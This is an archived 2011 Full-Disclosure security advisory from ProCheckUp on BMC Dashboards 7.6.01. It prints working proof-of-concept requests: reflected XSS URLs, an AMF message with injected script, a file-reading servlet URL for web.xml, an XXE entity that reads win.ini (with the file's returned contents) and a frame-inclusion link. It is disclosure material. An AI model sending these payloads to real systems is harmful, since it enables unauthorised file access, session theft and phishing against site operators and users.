lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Thu, 5 May 2011 17:36:56 +0100
From: research <research@...checkup.com>
To: <vuln@...unia.com>, <full-disclosure@...ts.grok.org.uk>,
	<bugtraq@...urityfocus.com>, <news@...uriteam.com>
Subject: PR10-18: Multiple XSS (Cross Site Scripting) and
 arbitrary file reading flaws within BMC Dashboards by BMC

PR10-18: Multiple XSS (Cross Site Scripting) and arbitrary file reading
flaws within BMC Dashboards by BMC

Vulnerability found: 1st Oct 2010

Vendor informed:

Vulnerability fixed:

Severity: High

Description:

BMC Dashboards provides service desk analysts with a dashboard view of
aggregated performance indicators, enabling timely fact based decisions.
ProCheckUp has discovered that multiple Remedy Knowledge Management
pages are vulnerable to reflective XSS attacks, along with a directory
traversal vulnerability which allows arbitrary files to be read outside
the web-root.

Version: 7.6.01    - http://www.bmc.com/

1) The following demonstrate the reflective XSS flaw

a)
https://target-domain.foo/bmc_help2u/help_services/html/xx/<script>alert(1)</script>404.htm

b)
https://target-domain.foo/bmc_help2u/servlet/helpServlet2u?textareaWrap=/bmc_help2u/help_services/demos/frameTst/my0a.jsp&msg="><script>alert(1)</script>

c) multiple XSS within demo pages
https://target-domain.foo/bmc_help2u/help_services/demos/helpTest.jsp?help='><script>alert(1)</script>

https://target-domain.foo/bmc_help2u/help_services/demos/setChromeDef.jsp?bFlag=<script>alert(1)</script>&submitVals=Call+setChromeDefBoolean

d) Multiple XSS as the AMF stream is unfiltered

POST /bsmdashboards/messagebroker/amfsecure HTTP/1.1
Content-Type: application/x-amf
Host: target-domain.foo
Content-Length: 462
........null../58.....    ..
.COflex.messaging.messages.RemotingMessage.timestamp.headers.operation

bodysource.remotePassword.remoteUsername.parameters.messageId.timeToLive.clientId.destination.........
#.
DSId.DSEndpoint.IFDCEEFC2-F318-1B37-7F3A-B438E60525E0..bsd-secure-amf...getUndefinedDataSources<script>alert(1)</script>
   ..
.qcom.bmc.bsm.dashboards.services.facade.RequestParameters.
#.    name.version..208Archive..1.0...
.Cflex.messaging.io.ArrayCollection    ..
..I3DDF906B-55F2-5E38-38C1-6A08D1AC077B..........IFDDDB883-6F0C-D935-5E7B-25CDF25C3538.-dashboardArchiveFacade

results:-
HTTP/1.1 200 OK
Date: Sat, 02 Oct 2010 00:15:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: application/x-amf
Content-Length: 4651

......../58/onStatus.......
.SIflex.messaging.messages.ErrorMessage.headers.rootCause
body.correlationId.faultDetail.faultString.clientId.timeToLive.destination.timestamp.extendedData.faultCode.messageId
..
..acom.bmc.bsm.dashboards.util.logging.BSDException.message
guid!localizedMessage.cause.arguments.priority.traceback.errorCode.causeSummary.System
error. Contact your system administrator for assistance.
.Kcom.bmc.bsm.dashboards.util.guid.Guid!uniqueIdentifier.AdZZZZZZZZJIiCvq53w9q0gerq4j8y0oq.0
.s?flex.messaging.MessageException.errorMessage."$)logStackTraceEnablednumber

codelogged.statusCode..-defaultLogMessageIntro.details#preferredLogLevel+rootCauseErrorMessage
.
......)Method 'getUndefinedDataSources<script>alert(1)</script>' not
found...1Cannot invoke method 'getUndefinedDataSourcesfdd4d

Consequences:
An attacker may be able to cause execution of malicious scripting code
in the browser of a user who clicks on a link to Remedy Knowledge
Management based site. Such code would run within the security context
of the target domain. This type of attack can result in non-persistent
defacement of the target site, or the redirection of confidential
information (i.e.: session IDs) to unauthorised third parties. No
authentication is required to exploit this vulnerability.

2) Application is vulnerable to file source code reading limited to the
web-root.

https://target-domain.foo/bmc_help2u/servlet/helpServlet2u?textareaWrap=/bmc_help2u/WEB-INF/web.xml

Consequences:
File source code reading allows Files to be retrieved from the target
server, provided that the location on the file system is known. No
authentication is required to exploit this vulnerability.

3) Verbose error pages - when parsing malicious amf messages
POST /bsmdashboards/messagebroker/amfsecure HTTP/1.1
Host: target-domain.foo
Content-Type: application/x-amf
Content-Length: 462

�COflex.messaging.messages.RemotingMessage.timestamp.headers.operation	body
source.remotePassword.remoteUsername.parameters.messageId.timeToLive.clientId.destination.

SIflex.messaging.messages.ErrorMessage.headers.rootCause	body.correlationId.faultDetail.faultString.clientId.timeToLive.destination.timestamp.extendedData.faultCode.messageId
..
�.acom.bmc.bsm.dashboards.util.logging.BSDException.message	guid!localizedMessage.cause.arguments.priority.traceback.errorCode.causeSummary.System
error. Contact your system administrator for assistance.
.Kcom.bmc.bsm.dashboards.util.guid.Guid!uniqueIdentifier.AdZZZZZZZZJIiCvq53w9q0gerq4j8y0n8.0
3;java.io.FileNotFoundException."$.?cf:\Program Files\BMC
Software\BMCDashboardsForBSM\BSMDashboards\archive\208Archive_1.025350<a>d026634a338.dar
(The filename, directory name, or volume label syntax is
incorrect).:....ERROR.Çecom.bmc.bsm.dashboards.util.logging.BSDException: System
error. Contact your system administrator for assistance.
	at
com.bmc.bsm.dashboards.archive.DashboardArchiveFacadeImpl.readArchiveHelper(DashboardArchiveFacadeImpl.java:585)
	at
com.bmc.bsm.dashboards.archive.DashboardArchiveFacadeImpl.readArchive(DashboardArchiveFacadeImpl.java:526)
	at
com.bmc.bsm.dashboards.archive.DashboardArchiveFacadeImpl.getUndefinedDataSources(DashboardArchiveFacadeImpl.java:193)
	at sun.reflect.GeneratedMethodAccessor767.invoke(Unknown Source)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
	at java.lang.reflect.Method.invoke(Unknown Source)
	at
com.bmc.bsm.dashboards.util.transaction.TransactionInvocationHandlerImpl$1.run(TransactionInvocationHandlerImpl.java:66)
	at
com.bmc.bsm.dashboards.util.transaction.TransactionHelperImpl.runInTransaction(TransactionHelperImpl.java:117)
	at
com.bmc.bsm.dashboards.util.transaction.TransactionHelperImpl.runInTransaction(TransactionHelperImpl.java:107)
	at
com.bmc.bsm.dashboards.util.transaction.TransactionInvocationHandlerImpl.invoke(TransactionInvocationHandlerImpl.java:60)
	at $Proxy54.getUndefinedDataSources(Unknown Source)


4)  Vulnerable to directory traversal as uses Adobe BlazeDS, breaking
out of the webroot see http://seclists.org/fulldisclosure/2010/Feb/383

POST /bsmdashboards/messagebroker/amfsecure HTTP/1.1

Host: target-domain.foo
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.10)
Gecko/20100914 Firefox/3.6.10 ( .NET CLR 3.5.30729; .NET4.0C)
Content-type: application/x-amf

POST DATA
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [ <!ENTITY x3 SYSTEM "../win.ini"> ]>
<amfx ver="3"><body>
    <object type="flex.messaging.messages.CommandMessage">
      <traits>

<string>body</string><string>clientId</string><string>correlationId</string>

<string>destination</string><string>headers</string><string>messageId</string>

<string>operation</string><string>timestamp</string><string>timeToLive</string>
      </traits><object><traits />
      </object>
      <null /><string /><string />
      <object>
        <traits>
          <string>DSId</string><string>DSMessagingVersion</string>
        </traits>
        <string>nil</string><int>1</int>
      </object>
      <string>&x3;</string>
<int>5</int><int>0</int><int>0</int>
    </object>
  </body>
</amfx>


win.ini
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
aif=MPEGVideo
aifc=MPEGVideo
aiff=MPEGVideo
asf=MPEGVideo
asx=MPEGVideo
au=MPEGVideo
m1v=MPEGVideo
m3u=MPEGVideo
mp2=MPEGVideo
mp2v=MPEGVideo
mp3=MPEGVideo
mpa=MPEGVideo
mpe=MPEGVideo
mpeg=MPEGVideo
mpg=MPEGVideo
mpv2=MPEGVideo
snd=MPEGVideo
wax=MPEGVideo
wm=MPEGVideo
wma=MPEGVideo
wmv=MPEGVideo
wmx=MPEGVideo
wpl=MPEGVideo
wvx=MPEGVideo

Consequences:
Directory traversal allows Files to be retrieved from the target server
outside the webroot, provided that the location on the file system is
known. Arbitrary file uploading should also be possible,  no
authentication is required to exploit this vulnerability.

5) Application is vulnerable to remote frame inclusion

https://target-domain.foo/bmc_help2u/help_services/html/index.htm?&URL=http://www.procheckup.com

Consequences:
An attacker may be able to gain access to confidential data, by carry
out a phishing attack.

Fix:

References:
http://www.procheckup.com/Vulnerabilities.php

Credits: Richard Brain and Jan Fry of ProCheckUp Ltd (www.procheckup.com)

Legal:
Copyright 2010 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the
Internet community for the purpose of alerting them to problems, if and
only if, the Bulletin is not edited or changed in any way, is attributed
to Procheckup, and provided such reproduction and/or distribution is
performed for non-commercial purposes.

Any other use of this information is prohibited. Procheckup is not
liable for any misuse of this information by any third party.



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ